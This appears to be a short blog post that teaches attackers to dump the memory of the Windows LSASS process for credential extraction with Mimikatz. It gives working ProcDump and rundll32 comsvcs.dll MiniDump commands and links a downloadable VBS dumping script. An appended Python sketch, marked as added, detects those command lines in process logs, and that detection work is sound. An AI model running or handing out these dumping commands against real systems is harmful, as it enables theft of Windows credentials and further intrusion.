Tuesday, April 14, 2020

LSASS Dumping Methods (For Mimikatz)


In every attack we need to obtain Windows credentials; this is a super important task. We target the "LSASS.EXE" process and dump its memory so that the dump can be used to extract credentials with Mimikatz.


Here are some of the important methods:

Using ProcDump:

1. The favorite method of dumping is "procdump.exe". This tool is from Microsoft PsTools.
2. Download ProcDump.exe and upload it to the remote system.
3. Command: "procdump -ma lsass.exe lsass.dmp"


Using VB Script:

Download the script from here:
https://drive.google.com/open?id=1jwy40ykrdEHWB1sddZ-Q5USDX9OOPOPp













rundll32 Command:

Essentially, the VBS script from the previous method uses the following command to dump the Lsass.exe process:

rundll32 C:\windows\system32\comsvcs.dll, MiniDump 992 C:\Users\Public\lsass.bin full

So even if you do not have the VB Script with you, you can still run the command directly and dump the LSASS process.
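For defenders, both command lines above are visible in process-creation logging. The following detection sketch is an added example, not part of the original post; the event field names (`host`, `command_line`) and the sample events are constructed for illustration.

```python
import re

# Rules for the two command lines shown in the post. Case-insensitive, as
# Windows command lines are. Lookaheads make the ProcDump rule order-independent.
RULES = {
    "procdump_lsass": re.compile(
        r"\bprocdump(64)?(\.exe)?\b(?=.*\s[-/]ma\b)(?=.*\blsass)", re.I),
    # The rundll32 form names only a PID, so this rule cannot key on "lsass":
    # it flags any comsvcs.dll MiniDump call and captures PID and output path.
    "comsvcs_minidump": re.compile(
        r"\brundll32(\.exe)?\b.*\bcomsvcs(\.dll)?\s*,?\s*MiniDump\s+"
        r"(?P<pid>\d+)\s+(?P<out>\S+)", re.I),
}

def detect(events):
    """Return one alert dict per process-creation event that matches a rule."""
    alerts = []
    for ev in events:
        for name, rx in RULES.items():
            m = rx.search(ev["command_line"])
            if m:
                alerts.append({"host": ev["host"], "rule": name,
                               "pid": m.groupdict().get("pid"),
                               "dump_path": m.groupdict().get("out")})
    return alerts

# Constructed sample events (shaped like Sysmon Event ID 1 / Security 4688 fields).
SAMPLE_EVENTS = [
    {"host": "WS01", "command_line": "procdump -ma lsass.exe lsass.dmp"},
    {"host": "WS02", "command_line":
        r"rundll32 C:\windows\system32\comsvcs.dll, MiniDump 992 C:\Users\Public\lsass.bin full"},
    {"host": "WS03", "command_line": "procdump64.exe -ma w3wp.exe w3wp.dmp"},
    {"host": "WS04", "command_line": r"rundll32.exe shell32.dll,Control_RunDLL desk.cpl"},
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

Because the rundll32 command line carries only a PID, the captured `pid` should be correlated with the process list to confirm the target was lsass.exe, and the captured `dump_path` tells responders which file to collect. Pairing this with process-access telemetry on lsass.exe (Sysmon Event ID 10) covers cases where the command line does not name the target.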


















